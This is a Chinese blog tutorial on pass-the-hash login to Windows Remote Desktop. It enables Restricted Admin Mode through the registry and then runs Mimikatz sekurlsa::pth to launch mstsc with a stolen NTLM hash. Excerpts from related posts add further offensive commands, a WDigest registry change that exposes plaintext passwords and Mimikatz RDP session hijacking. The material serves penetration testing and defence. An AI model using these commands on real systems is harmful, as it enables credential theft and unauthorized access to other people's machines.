利用哈希传递登录 RDP 远程桌面

已于 2024-01-15 15:18:47 修改
阅读量1.3k 收藏 9
点赞数 13
文章标签: rdp ntlm pth 内网渗透
于 2024-01-15 15:18:07 首次发布
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/135602323
版权

简介

Windows Server 2012 R2 采用了新版的 RDP 远程桌面协议,在这个新版协议中有一个 ”受限管理员” (Restricted Admin)的特性。相信渗透测试人员和系统管理员都会对这个特性有足够的兴趣,因为通过这个特性,我们可以实现哈希传递攻击并成功登录远程桌面。
在抓取到的 Hash 无法破解的情况下,如果目标主机开启了 “Restricted Admin Mode” 也行,那么我们便可以使用 Hash 来直接实现 RDP 远程登录。Restricted Admin Mode 在 Windows 8.1 和 Windows Server 2012 R2 上默认开启。

利用

1、客户端、服务器都需要开启Restricted Admin Mode。
2、win 2012实测可用。
通过修改注册表的方式开启目标主机的 Restricted Admin Mode,值为 0 代表开启,值为 1 代表关闭:
REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f #开启Restricted Admin Mode,需要管理员权限。 REG query “HKLM\System\CurrentControlSet\Control\Lsa” | findstr “DisableRestrictedAdmin” # 查看是否成功开启
image.png
如上图所示,成功在目标主机开启了 Restricted Admin Mode。
然后再攻击机上使用 Mimikatz 进行哈希传递,大致原理就是哈希传递成功后执行mstsc.exe /restrictedadmin来打开:
privilege::debug #管理员运行。 sekurlsa::pth /user:administrator /domain:xxx.com /ntlm:xxx “/run:mstsc.exe /restrictedadmin”
在这里插入图片描述
image.png

LQxdp
关注
  • 13
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1389
内网环境下的横向移动总结
使用Hash远程RDP登录
谢公子的博客
04-20 4348
我们知道在Windows Server2012及其以后的版本中,使用mimikatz在内存中抓取不到明文密码了,这是微软为了防止内存中泄露明文密码做的一个安全措施。 但是修改注册表后重启依然可以抓取到明文密码,执行如下命令,等待目标机器重启后使用mimikatz即可抓取到明文密码 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d
红队攻防之hash登录RDP
天行健,君子以自强不息
11-29 1448
没什么好害怕,孩子放心去飞吧,在你的身后有个等你的家
kali下利用FreeRDP进行hash登录远程桌面
crowsec
08-07 1790
在很多情况下,拿不到明文密码,由于对方机器是win2012的话,可以尝试使用hash登录RDP,看下桌面有什么东西。
内网渗透:四、windowsRDP-hash传递登录
liu_jia_liang的博客
02-21 5330
windows的RDP-hash登录利用 在渗透测试中,如果获得了某个用户的NTLM hash,我们可以尝试使用hash传递的方法对WMI和SMB服务进行登录,对于远程桌面服务同样可以进行利用。抓取hash无法破解的情况下,如果使用hash远程登录RDP,需要开启"Restricted Admin Mode", 在Windows8.1和Windows Server 2012R2上默认开启。 一:windows RDP-受限管理模式 Restricted Admin mode简介 官方说明:Restric
Hash传递攻击Windows2012远程桌面
Coisini的博客
06-15 1321
前言: 小伙伴们还记得metasploit的模块可以使用hash登录windows么,可惜仅仅对XP,2003有效。本文会介绍一种使用hash登录 widnows2012R2服务器远程桌面的方法。是的,你没有看错,使用Hash登录远程桌面!windows2012R2中文版测试通过! windows2012R2采用了新版的远程桌面协议(RDP).本文主要讨论一下新版协议中的”受限管理员”(Rest...
红队技巧-域渗透的协议利用
Gamma_lab的博客
06-29 2442
1.pth(hash传递) 1.1 PTH简介 哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统,攻击者无须通过解密hash值来获取明文密码,因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击,攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。 1.2 PTH限制 在03之后有了uac,所以本地只有sid 为500和admi
密码安全攻防技术精讲
GitChat
07-03 3069
课程介绍 本课程内容将以作者亲身经历的事情为主,从技术的视野和攻防角度来剖析各种密码及其他技术对工作和个人生活的影响,将“高高在上”的技术拉进我们日常的生活中来。每一篇文章都是精挑细选的典型案例,背后都有真实故事和场景,以技术的方式来再现和还原。 非技术专业读者可以通过这些文章来了解和预防各种涉及密码的攻击,从事技术工作的读者可以按照文章的搭建环境进行实战实践。由于篇幅有限,密码攻防涉及的技术非常...
后渗透之攻击RDP利用凭据传递攻击(Path The Hash)
Jietewang的博客
08-08 924
在之前的文章中[后渗透之搞定RDP简析]介绍了关于Windows Server 2012之后的版本不存储明文密码。 但是依旧可以通过修改注册表和mimikatz来达到获取密文密码的目的 reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 根据上...
使用Hash直接登录Windows
十年磨一剑,霜刃未曾试!
10-24 2657
首先,在本地主机(假设为目标主机)  新建一个wooyun用户,并为之设置密码,然后通过gethashes.exe获取到HASH  C:\>net user wooyun test  The command completed successfully.  C:\>gethashes.exe $local  1:1007:C2265B23734E0DACAAD3B435B
WINDOWS 窃取hash实现远程登录
The current road is different, love needs to distinguish between right and wrong
11-18 901
前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 一、Windows常用用户 SYSTEM: #本地机器上拥有最高权限的用户。 Administrator: #本地机器上拥有最高权限的用户。 Guest: # 只拥有相对较少的权限,默认被禁用。 二、Windows密码安全 1. Quarks P...
第15篇:内网横向中windows各端口远程登录哈希传递的方法总结
ABC_123的博客
06-09 3284
Part1 前言随着人们的安全意识的逐步加强,企业内部的Windows服务器口令越来越复杂了,经常会遇到提权到windows服务器,获取了用户的密码hash,但是cmd5官网或者本地猜解都拿不到明文密码的情况。这时候就需要用到内网哈希传递技术了。哈希传递利用NTLM认证的缺陷,使用用户的密码哈希值来进行NTLM认证。如果目标机器与获取hash值的机器的密码相同,就可......
内网渗透哈希传递
weixin_58954236的博客
10-09 388
哈希传递(Pass The。
【内网安全】哈希传递
过期的秋刀鱼
10-09 226
哈希传递攻击是针对相同密码的用户认证直接发起攻击,如果当域内的其他主机密码和实现主机上的密码一致,那hash值就一直,hash值一致的情况下,可以不需要明文密码登陆对方的远程桌面,查看对方主机的C盘,文件等操作
域渗透之那些显为人知的RDP漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 2540
远程桌面对了解内网渗透的人来说可能再熟悉不过了。在渗透测试中,拿下一台主机后有时候会选择开 3389 进远程桌面查看一下对方主机内有无一些有价值的东西可以利用。但是远程桌面利用不仅如此,本节我们便来初步汇总一下远程桌面内网渗透中的各种利用姿势。
wo-27s管理员账户和密码_“无法使用内置管理员账户打开”应用
weixin_39529128的博客
11-20 1977
我们经常会遇到“无法使用内置管理员账户打开”某个应用(如下图所示),应该如何操作?下面介绍三种方法:方法一:设置管理员账号1、修改当前账号为管理员账号【Win】+【Q】调出搜索框,搜索【CMD】,右击【命令提示符】选择【以管理员身份运行】,输入命令:【net localgroup administrators 用户名 /add】回车,注意空格。然后使用新的管理员账号登录,并打开对应应用即可。2、新...
关于RDP劫持小技巧
Adminxe的博客
04-15 875
一、劫持方式1: 创建用户: net user test 123.com /add net localgroup administrators test /add 登录后,使用mimikatz工具 privilege::debug #提权 ts::sessions #查看当前主机的会话 token::elevate #提升本地管理员权限为system ts::remote /id:1 #劫持id为1的会话 二、劫持方式2: mimikatz命令如下: privil
远程启用受限管理模式:GhostPack的RestrictedAdmin项目教程
最新发布
gitblog_01119的博客
08-25 804
远程启用受限管理模式:GhostPack的RestrictedAdmin项目教程 RestrictedAdminRemotely enables Restricted Admin Mode项目地址:https://gitcode.com/gh_mirrors/re/RestrictedAdmin 项目介绍 RestrictedAdmin 是由GhostPack维护的一个开源工具,旨在远程启用W...
利用哈希表实现电话号码管理系统
05-12
电话号码管理系统可以使用哈希表来实现。哈希表是一种能够高效存储和查询键值对的数据结构。在电话号码管理系统中,我们可以将电话号码作为键,将联系人姓名等信息作为值,将它们存储在哈希表中。 具体实现步骤如下: 1. 定义一个哈希表,用于存储电话号码和联系人信息。哈希表可以使用数组和链表实现。 2. 定义一个哈希函数,将电话号码转换为哈希表的索引。哈希函数应该尽可能均匀地将电话号码映射到哈希表中的索引,避免哈希冲突。 3. 插入电话号码和联系人信息。通过哈希函数将电话号码映射到哈希表的索引,如果该索引已经被占用,则使用链表将新的键值对添加到该索引对应的链表的末尾。如果该索引未被占用,则直接将键值对插入到该索引。 4. 查询电话号码对应的联系人信息。通过哈希函数将电话号码映射到哈希表的索引,如果该索引未被占用,则说明该电话号码不存在于哈希表中。如果该索引已被占用,则在该索引对应的链表中查找电话号码对应的联系人信息。 5. 更新电话号码对应的联系人信息。通过哈希函数将电话号码映射到哈希表的索引,如果该索引未被占用,则说明该电话号码不存在于哈希表中。如果该索引已被占用,则在该索引对应的链表中查找电话号码对应的键值对,并更新其联系人信息。 6. 删除电话号码和联系人信息。通过哈希函数将电话号码映射到哈希表的索引,如果该索引未被占用,则说明该电话号码不存在于哈希表中。如果该索引已被占用,则在该索引对应的链表中查找电话号码对应的键值对,并将其从链表中删除。 哈希表实现电话号码管理系统的时间复杂度与哈希函数的效率及哈希冲突的解决方式有关,一般情况下查询、插入、更新和删除操作的时间复杂度为O(1)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值